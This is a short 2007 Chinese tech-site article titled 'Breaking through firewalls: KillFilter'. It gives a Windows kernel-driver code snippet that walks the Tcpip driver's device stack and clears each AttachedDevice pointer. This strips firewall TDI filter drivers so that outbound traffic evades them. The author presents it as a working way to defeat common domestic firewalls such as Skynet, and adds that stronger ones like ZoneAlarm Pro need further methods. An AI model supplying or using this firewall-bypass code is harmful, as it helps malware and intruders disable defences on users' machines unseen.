突破防火墙之KillFilter

 2007-8-31 17:12:34 来源：PC235.COM 您有问题？请联系我们

关 键 词：突破防火墙之KillFilter

   

唉，软件防火墙好像没一个令我满意的，都比较弱，考虑不全。国内的防火墙更是令人心寒~ 无论是DLL注入还是不引入DLL的纯代码注入，还是TDI Cilent，都能把国内的防火墙搞定。NDIS hook 更不要说了..

来点好玩的，其实我们只要写个驱动，从设备栈里把防火墙的TDI过滤驱动给摘除掉，这样就能对付一般的防火墙了。当然，国外强一点的防火墙，比如ZoneAlarm Pro 6.5就得再结合其他方法了，嘿嘿。

摘除过滤驱动的代码片段：



RtlInitUnicodeString ( &TcpipName, L"\\Driver\\Tcpip" );

ObReferenceObjectByName( &TcpipName,
                      OBJ_CASE_INSENSITIVE,
                      NULL,
                      0,
                      *IoDriverObjectType,
                      KernelMode,                                          
                      NULL,
                      &TcpipDrvObj);

 CurrentDevice = TcpipDrvObj->DeviceObject;

 while(CurrentDevice != NULL )
 {
 CurrentDevice->AttachedDevice=0;
 CurrentDevice = CurrentDevice->NextDevice;
 }



这段代码就能足以使国内人人皆知的天网防火墙装了和没装一样... 呵呵

PS:这里的突破指的是软件防火墙的内对外层面。

突破防火墙之KillFilter文章结束

更多内容请看 菜鸟学堂 > > 计算机网络安全专题

上一个文章： 五招查出想要知道的IP地址

下一个文章： 如何实现纵深化的网络安全防御？